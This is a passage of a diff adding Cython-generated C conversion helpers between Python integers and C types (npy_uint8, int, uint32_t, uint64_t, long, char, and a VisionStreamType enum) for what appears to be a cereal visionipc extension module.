goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((npy_uint8) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(npy_uint8) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((npy_uint8) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((npy_uint8) 1) << (sizeof(npy_uint8) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (npy_uint8) -1; + } + } else { + npy_uint8 val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (npy_uint8) -1; + val = __Pyx_PyInt_As_npy_uint8(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to npy_uint8"); + return (npy_uint8) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to npy_uint8"); + return (npy_uint8) -1; +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_unsigned_char(unsigned char value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const unsigned char neg_one = (unsigned char) -1, const_zero = (unsigned char) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(unsigned char) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(unsigned char) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(unsigned char) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(unsigned char) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(unsigned char) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(unsigned char), + little, !is_unsigned); + } +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(int) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(int) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(int) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(int), + little, !is_unsigned); + } +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_uint32_t(uint32_t value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const uint32_t neg_one = (uint32_t) -1, const_zero = (uint32_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(uint32_t) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(uint32_t) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(uint32_t) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(uint32_t) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(uint32_t) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(uint32_t), + little, !is_unsigned); + } +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_uint64_t(uint64_t value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const uint64_t neg_one = (uint64_t) -1, const_zero = (uint64_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(uint64_t) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(uint64_t) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(uint64_t) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(uint64_t) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(uint64_t) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(uint64_t), + little, !is_unsigned); + } +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_enum__VisionStreamType(enum VisionStreamType value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const enum VisionStreamType neg_one = (enum VisionStreamType) -1, const_zero = (enum VisionStreamType) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(enum VisionStreamType) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(enum VisionStreamType) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(enum VisionStreamType) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(enum VisionStreamType) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(enum VisionStreamType) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(enum VisionStreamType), + little, !is_unsigned); + } +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType neg_one = (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) -1, const_zero = (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType), + little, !is_unsigned); + } +} + +/* CIntFromPy */ + static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(long) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (long) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { + return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { + return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { + return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(long) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(long) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + long val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (long) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (long) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (long) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (long) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (long) -1; + } + } else { + long val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (long) -1; + val = __Pyx_PyInt_As_long(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to long"); + return (long) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to long"); + return (long) -1; +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(long) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(long) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(long) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(long), + little, !is_unsigned); + } +} + +/* CIntFromPy */ + static CYTHON_INLINE char __Pyx_PyInt_As_char(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const char neg_one = (char) -1, const_zero = (char) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(char) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(char, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (char) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(char, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(char) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) >= 2 * PyLong_SHIFT)) { + return (char) (((((char)digits[1]) << PyLong_SHIFT) | (char)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(char) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) >= 3 * PyLong_SHIFT)) { + return (char) (((((((char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(char) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) >= 4 * PyLong_SHIFT)) { + return (char) (((((((((char)digits[3]) << PyLong_SHIFT) | (char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (char) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(char) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(char, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(char) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(char, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(char, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(char) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 2 * PyLong_SHIFT)) { + return (char) (((char)-1)*(((((char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(char) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 2 * PyLong_SHIFT)) { + return (char) ((((((char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(char) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 3 * PyLong_SHIFT)) { + return (char) (((char)-1)*(((((((char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(char) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 3 * PyLong_SHIFT)) { + return (char) ((((((((char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(char) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 4 * PyLong_SHIFT)) { + return (char) (((char)-1)*(((((((((char)digits[3]) << PyLong_SHIFT) | (char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(char) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 